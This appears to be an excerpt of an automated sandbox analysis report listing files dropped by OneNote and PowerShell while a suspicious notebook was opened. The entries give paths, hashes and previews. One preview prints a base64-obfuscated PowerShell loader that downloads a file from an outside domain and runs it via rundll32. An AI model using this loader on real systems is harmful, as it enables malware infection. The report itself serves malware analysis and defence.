                                                                                                                                                    Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):76485
                                                                                                                                                    Entropy (8bit):7.79809544163696
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                    MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                    SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                    SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
                                                                                                                                                    SHA-512:23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......*......v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1354
                                                                                                                                                    Entropy (8bit):7.799120546917745
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
                                                                                                                                                    MD5:C2BF462C1311A92660999498F29394BD
                                                                                                                                                    SHA1:4BD7C156F172C1114F33D80BAB05252C9F8E87C0
                                                                                                                                                    SHA-256:5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
                                                                                                                                                    SHA-512:1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P*.(....}:&'ldc...c|.bs.>z.:?.M....(.SR..a..o..*=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....|.4.,/......=.z%.F....*Z...>.*.A.....?.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:ASCII text, with very long lines (372), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):372
                                                                                                                                                    Entropy (8bit):5.8138289883344685
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSAP/7XfkfYRRjpm+Rs3FEY9hMS/aXXrZ/I:ssLgyaI4HPKC2EwgvBS2/7Xjj4+RIFEk
                                                                                                                                                    MD5:7B496ED05993DC9E0510941660F450B1
                                                                                                                                                    SHA1:1D05D4A1D54D9DB7E0636D2462A2AD4F6136E57D
                                                                                                                                                    SHA-256:A2D81D7963DEBAB5291457FBA18E7E46D716C1271E32B5B5125441BED3D5573D
                                                                                                                                                    SHA-512:CCB894F9EAF59FA68B68DD4F66C4B38F960782075CD47E3107B600B48108F5F63B47D2E1C17A5A2763053834992D53766DAAAF6DBB32BECBD349E9FD210500C8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL25lcnVsZ3lta2hhbmEuY29tL0NDb04vMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:GIF image data, version 89a, 1012 x 327
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11765
                                                                                                                                                    Entropy (8bit):7.911655818336033
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
                                                                                                                                                    MD5:B035F23C68CC9673E604FE5472F223D2
                                                                                                                                                    SHA1:56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
                                                                                                                                                    SHA-256:F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
                                                                                                                                                    SHA-512:B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:GIF89a..G.................................................................................................................................................................|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..|..~.................................................................................................................................................!.......,......G........H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):64
                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:@...e...........................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):362512
                                                                                                                                                    Entropy (8bit):7.4865159099376735
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:PyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:lWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                                                                    MD5:702E2595DBBC8C1402B955224BD1D721
                                                                                                                                                    SHA1:185BB86F1F2113009AA1EBE4912BED789624AF12
                                                                                                                                                    SHA-256:2C98ABD886BFDF2BBA24DD6B1D72D74D8A0D988F18F5297DFA72809E26E2B233
                                                                                                                                                    SHA-512:6FAC7A47F4A9B4AB84421A419E6239CF5FF4DBEFBF85EE5476DA7289BB26C7458A501DC82B9634EAC4935AF94A84CCFE196C92FC80FECB188C58F0BF40A53F5E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.R\{..M..Sx.)..l....u/D...p.r.................?.....I.......*...*...*...*.....................................................E.F.H.\w...#..d(.x...........(~......................8.......0...................hzLu(.]A....7.#w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5136
                                                                                                                                                    Entropy (8bit):2.7813805260132334
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cjnKV/uIPv4om1mAlthbX5HXU+3ac0Jac3:hCnrDra9Jaq
                                                                                                                                                    MD5:02C920C0AB0B305CBA7C59C6AD4193C5
                                                                                                                                                    SHA1:8F5D82360387B5B9F4A519E1CE5F12F9EA310813
                                                                                                                                                    SHA-256:8D14958D1BB46BCF31DEFA6DD2A3A6AAE7B34628213435DCF08C528B46F171C0
                                                                                                                                                    SHA-512:858DD3076854A2452F5F57B52D6DC457F9C765677BD5E3B01BA962F1330A284FEEF486944FE2AC42699831E1F749C768320087BA57FA79E82B59D595E61A1289
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:./.C..vL....W"v_..E.F.H.\w...#.................?.....I............................................................................................................................................................nN.f,iN...ns..........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.3276422954223548
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:UPmcjSl/T+t+Wpya/uMcl0qvMcl95hDoiXb+lhO3Ti1UEZ+lX1MAx7vKlCXlvG9a:U1jzLyaq9995eMb+i3qQ137v+uya
                                                                                                                                                    MD5:CDDBC14CDCD9D96F9A49378EE6FED787
                                                                                                                                                    SHA1:E83D1D2AAEF53133DF6A43E3B1E14AD30AF3BD20
                                                                                                                                                    SHA-256:624BF6D49B6E7E87EB4289078B7144D668A37A5C4639AF8B725CBE0820146C58
                                                                                                                                                    SHA-512:42FAA9FC9CE50213FF3400296F25794198421B64405C5912F403E2782C9005283444516F4322984B9D774961B387C851CA75A5DD5D3CFA9D2D93D923850F7997
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.@..`...........................................`...............................(.......................@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................7E....... .........p;..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.(.......B.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54qw5cdw.to2.psm1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gf3ru34.23y.psm1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdcypmx.keq.ps1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnqo3hxp.opj.ps1

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1
                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:1

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{01DF93F7-D7C8-49E7-ACF5-42B9506E720C}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1604
                                                                                                                                                    Entropy (8bit):7.814570704154439
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                    MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                    SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                    SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                    SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{03EF2E50-AC66-4BEA-B2D2-3F37B5438107}

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1354
                                                                                                                                                    Entropy (8bit):7.799120546917745
                                                                                                                                                    Encrypted:false
